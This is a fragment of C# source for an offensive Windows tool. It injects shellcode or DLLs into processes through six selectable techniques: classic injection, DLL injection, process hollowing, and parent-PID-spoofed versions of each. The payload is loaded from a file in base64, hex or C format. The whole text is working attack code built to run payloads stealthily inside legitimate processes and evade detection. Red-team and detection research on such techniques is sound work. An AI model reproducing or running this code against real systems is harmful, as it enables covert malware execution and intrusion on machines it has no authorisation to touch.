public void PPidSpoof(string binary, byte[] shellcode, int parentpid) { PROCESS_INFORMATION pinf = ParentSpoofing(parentpid, binary); ProcHollowing hollow = new ProcHollowing(); hollow.CreateSection((uint)shellcode.Length); hollow.FindEntry(pinf.hProcess); hollow.SetLocalSection((uint)shellcode.Length); hollow.CopyShellcode(shellcode); hollow.MapAndStart(pinf); CloseHandle(pinf.hThread); CloseHandle(pinf.hProcess); }
static void Main(string[] args) { try { logo(); // https://github.com/GhostPack/Rubeus/blob/master/Rubeus/Domain/ArgumentParser.cs#L10 var arguments = new Dictionary <string, string>(); foreach (var argument in args) { var idx = argument.IndexOf(':'); if (idx > 0) { arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); } else { arguments[argument] = string.Empty; } } WindowsIdentity identity = WindowsIdentity.GetCurrent(); WindowsPrincipal principal = new WindowsPrincipal(identity); if (principal.IsInRole(WindowsBuiltInRole.Administrator)) { Console.WriteLine($"[+] Process running with {principal.Identity.Name} privileges with HIGH integrity."); } else { Console.WriteLine($"[+] Process running with {principal.Identity.Name} privileges with MEDIUM / LOW integrity."); } if (arguments.Count == 0) { Console.WriteLine("[+] No arguments specified. Please refer the help section for more details."); help(); } else if (arguments.Count < 3) { Console.WriteLine("[+] Some arguments are missing. Please refer the help section for more details."); help(); } else if (arguments.Count >= 3) { int procid = 0; if (arguments.ContainsKey("/pid")) { procid = Convert.ToInt32(arguments["/pid"]); Process process = Process.GetProcessById(procid); } if (System.IO.File.Exists(arguments["/path"])) { if (arguments["/t"] == "1") { var shellcode = System.IO.File.ReadAllText(arguments["/path"]); byte[] buf = new byte[] { }; if (arguments["/f"] == "base64") { buf = Convert.FromBase64String(shellcode); } else if (arguments["/f"] == "hex") { buf = StringToByteArray(shellcode); } else if (arguments["/f"] == "c") { buf = convertfromc(shellcode); } CodeInject(procid, buf); } else if (arguments["/t"] == "2") { var dllpath = arguments["/path"]; byte[] buf = Encoding.Default.GetBytes(dllpath); DLLInject(procid, buf); } else if (arguments["/t"] == "3") { var shellcode = System.IO.File.ReadAllText(arguments["/path"]); byte[] buf = new byte[] { }; if (arguments["/f"] == "base64") { buf = Convert.FromBase64String(shellcode); } else if (arguments["/f"] == "hex") { buf = StringToByteArray(shellcode); } else if (arguments["/f"] == "c") { buf = convertfromc(shellcode); } ProcHollowing prochollow = new ProcHollowing(); prochollow.Hollow(arguments["/ppath"], buf); } else if (arguments["/t"] == "4") { Console.WriteLine($"[+] Parent Process Spoofing with Vanila Process Injection Technique."); ParentPidSpoofing Parent = new ParentPidSpoofing(); string ppid = null; int parentProc = 0; ppid = Convert.ToString(arguments["/parentproc"]); parentProc = Parent.SearchForPPID(ppid); var shellcode = System.IO.File.ReadAllText(arguments["/path"]); byte[] buf = new byte[] { }; if (arguments["/f"] == "base64") { buf = Convert.FromBase64String(shellcode); } else if (arguments["/f"] == "hex") { buf = StringToByteArray(shellcode); } else if (arguments["/f"] == "c") { buf = convertfromc(shellcode); } PPIDCodeInject(arguments["/ppath"], buf, parentProc); } else if (arguments["/t"] == "5") { Console.WriteLine($"[+] Parent Process Spoofing with DLL Process Injection Technique."); ParentPidSpoofing Parent = new ParentPidSpoofing(); string ppid = null; int parentProc = 0; ppid = Convert.ToString(arguments["/parentproc"]); parentProc = Parent.SearchForPPID(ppid); var dllpath = arguments["/path"]; byte[] buf = Encoding.Default.GetBytes(dllpath); PPIDDLLInject(arguments["/ppath"], buf, parentProc); } else if (arguments["/t"] == "6") { Console.WriteLine($"[+] Parent Process Spoofing with Process Hollowing Injection Technique."); ParentPidSpoofing Parent = new ParentPidSpoofing(); string ppid = null; int parentProc = 0; ppid = Convert.ToString(arguments["/parentproc"]); parentProc = Parent.SearchForPPID(ppid); var shellcode = System.IO.File.ReadAllText(arguments["/path"]); byte[] buf = new byte[] { }; if (arguments["/f"] == "base64") { buf = Convert.FromBase64String(shellcode); } else if (arguments["/f"] == "hex") { buf = StringToByteArray(shellcode); } else if (arguments["/f"] == "c") { buf = convertfromc(shellcode); } Parent.PPidSpoof(arguments["/ppath"], buf, parentProc); } } else { Console.WriteLine("[+] File doesn't exists. Please check the specified file path."); } } else { Console.WriteLine("[+] Invalid argument. Please refer the help section for more details."); help(); } } catch (Exception ex) { Console.WriteLine(ex.Message); } }